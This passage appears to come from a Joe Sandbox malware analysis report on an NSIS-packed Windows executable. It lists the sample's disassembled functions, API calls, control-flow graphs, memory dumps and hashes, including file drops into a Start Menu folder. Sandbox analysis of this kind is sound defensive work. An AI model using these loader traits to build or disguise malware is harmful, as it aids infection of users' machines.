                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                                                                                                                                                                • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                                                                                                                                                                • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                • API String ID: 606308-2759440662
                                                                                                                                                                                • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                                                                                                                                                                • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                                                                                                                                                                • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D
                                                                                                                                                                                Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 368 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 371 403065-40306a 368->371 372 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 368->372 373 403245-403249 371->373 380 4030a3 372->380 381 403188-403196 call 402fb1 372->381 383 4030a8-4030bf 380->383 388 403198-40319b 381->388 389 4031eb-4031f0 381->389 385 4030c1 383->385 386 4030c3-4030cc call 403444 383->386 385->386 393 4031f2-4031fa call 402fb1 386->393 394 4030d2-4030d9 386->394 391 40319d-4031b5 call 40345a call 403444 388->391 392 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 388->392 389->373 391->389 414 4031b7-4031bd 391->414 392->389 419 4031fc-40320d 392->419 393->389 398 403155-403159 394->398 399 4030db-4030ef call 405e9f 394->399 403 403163-403169 398->403 404 40315b-403162 call 402fb1 398->404 399->403 417 4030f1-4030f8 399->417 410 403178-403180 403->410 411 40316b-403175 call 4068d0 403->411 404->403 410->383 418 403186 410->418 411->410 414->389 414->392 417->403 421 4030fa-403101 417->421 418->381 422 403215-40321a 419->422 423 40320f 419->423 421->403 425 403103-40310a 421->425 424 40321b-403221 422->424 423->422 424->424 426 403223-40323e SetFilePointer call 405e9f 424->426 425->403 427 40310c-403113 425->427 430 403243 426->430 427->403 429 403115-403135 427->429 429->389 431 40313b-40313f 429->431 430->373 432 403141-403145 431->432 433 403147-40314f 431->433 432->418 432->433 433->403 434 403151-403153 433->434 434->403
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403026
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\02Eh1ah35H.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                                                                                                  • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                                                                                                                  • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\02Eh1ah35H.exe,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\02Eh1ah35H.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                • API String ID: 2803837635-2235659462
                                                                                                                                                                                • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                                                                                                                                                                • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                                                                                                                                                                • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                                                                                                                                                                • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D
                                                                                                                                                                                Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 720 40642b-406436 721 406438-406447 720->721 722 406449-40645f 720->722 721->722 723 406465-406472 722->723 724 406677-40667d 722->724 723->724 727 406478-40647f 723->727 725 406683-40668e 724->725 726 406484-406491 724->726 728 406690-406694 call 4063ee 725->728 729 406699-40669a 725->729 726->725 730 406497-4064a3 726->730 727->724 728->729 732 406664 730->732 733 4064a9-4064e7 730->733 736 406672-406675 732->736 737 406666-406670 732->737 734 406607-40660b 733->734 735 4064ed-4064f8 733->735 738 40660d-406613 734->738 739 40663e-406642 734->739 740 406511 735->740 741 4064fa-4064ff 735->741 736->724 737->724 743 406623-40662f call 4063ee 738->743 744 406615-406621 call 406335 738->744 746 406651-406662 lstrlenW 739->746 747 406644-40664c call 40642b 739->747 745 406518-40651f 740->745 741->740 742 406501-406504 741->742 742->740 748 406506-406509 742->748 758 406634-40663a 743->758 744->758 750 406521-406523 745->750 751 406524-406526 745->751 746->724 747->746 748->740 754 40650b-40650f 748->754 750->751 756 406561-406564 751->756 757 406528-40654f call 4062bc 751->757 754->745 761 406574-406577 756->761 762 406566-406572 GetSystemDirectoryW 756->762 769 406555-40655c call 40642b 757->769 770 4065ef-4065f2 757->770 758->746 760 40663c 758->760 766 4065ff-406605 call 40669d 760->766 763 4065e2-4065e4 761->763 764 406579-406587 GetWindowsDirectoryW 761->764 767 4065e6-4065ea 762->767 763->767 768 406589-406593 763->768 764->763 766->746 767->766 771 4065ec 767->771 774 406595-406598 768->774 775 4065ad-4065c3 SHGetSpecialFolderLocation 768->775 769->767 770->766 777 4065f4-4065fa lstrcatW 770->777 771->770 774->775 778 40659a-4065a1 774->778 779 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 775->779 780 4065de 775->780 777->766 782 4065a9-4065ab 778->782 779->767 779->780 780->763 782->767 782->775
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                                                                                                                                                                • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                • API String ID: 717251189-1230650788
                                                                                                                                                                                • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                                                                                                                                • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                                                                                                                                                                • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                                                                                                                                                                • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E
                                                                                                                                                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 783 40176f-401794 call 402d3e call 405d3a 788 401796-40179c call 4063ee 783->788 789 40179e-4017b0 call 4063ee call 405cc3 lstrcatW 783->789 794 4017b5-4017b6 call 40669d 788->794 789->794 798 4017bb-4017bf 794->798 799 4017c1-4017cb call 40674c 798->799 800 4017f2-4017f5 798->800 807 4017dd-4017ef 799->807 808 4017cd-4017db CompareFileTime 799->808 802 4017f7-4017f8 call 405ebf 800->802 803 4017fd-401819 call 405ee4 800->803 802->803 810 40181b-40181e 803->810 811 40188d-4018b6 call 405456 call 40324c 803->811 807->800 808->807 813 401820-40185e call 4063ee * 2 call 40642b call 4063ee call 405a54 810->813 814 40186f-401879 call 405456 810->814 825 4018b8-4018bc 811->825 826 4018be-4018ca SetFileTime 811->826 813->798 847 401864-401865 813->847 823 401882-401888 814->823 827 402bcb 823->827 825->826 829 4018d0-4018db CloseHandle 825->829 826->829 830 402bcd-402bd1 827->830 832 4018e1-4018e4 829->832 833 402bc2-402bc5 829->833 835 4018e6-4018f7 call 40642b lstrcatW 832->835 836 4018f9-4018fc call 40642b 832->836 833->827 842 401901-402390 835->842 836->842 845 402395-40239a 842->845 846 402390 call 405a54 842->846 845->830 846->845 847->823 848 401867-401868 847->848 848->814
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                                                                                                                                                                  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F423A0), ref: 004054B1
                                                                                                                                                                                  • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp$C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                                                                                                                                • API String ID: 1941528284-1199726073
                                                                                                                                                                                • Opcode ID: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                                                                                                                                • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                                                                                                                                                                • Opcode Fuzzy Hash: d08f73f743aae90bf59320a470bb384619887ead500b3c6bbfc993fd6adf6129
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E
                                                                                                                                                                                Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 849 405456-40546b 850 405471-405482 849->850 851 405522-405526 849->851 852 405484-405488 call 40642b 850->852 853 40548d-405499 lstrlenW 850->853 852->853 855 4054b6-4054ba 853->855 856 40549b-4054ab lstrlenW 853->856 857 4054c9-4054cd 855->857 858 4054bc-4054c3 SetWindowTextW 855->858 856->851 859 4054ad-4054b1 lstrcatW 856->859 860 405513-405515 857->860 861 4054cf-405511 SendMessageW * 3 857->861 858->857 859->855 860->851 862 405517-40551a 860->862 861->860 862->851
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                                                                                                                • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                                                                                                                • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F423A0), ref: 004054B1
                                                                                                                                                                                • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                                                • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                                                                                                                                • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                                                                                                                                                                • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                                                                                                                                • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8
                                                                                                                                                                                Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 863 405925-405970 CreateDirectoryW 864 405972-405974 863->864 865 405976-405983 GetLastError 863->865 866 40599d-40599f 864->866 865->866 867 405985-405999 SetFileSecurityW 865->867 867->864 868 40599b GetLastError 867->868 868->866
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040597C
                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040599B
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                                                                                                                                                                • C:\Users\user\Desktop, xrefs: 00405925
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
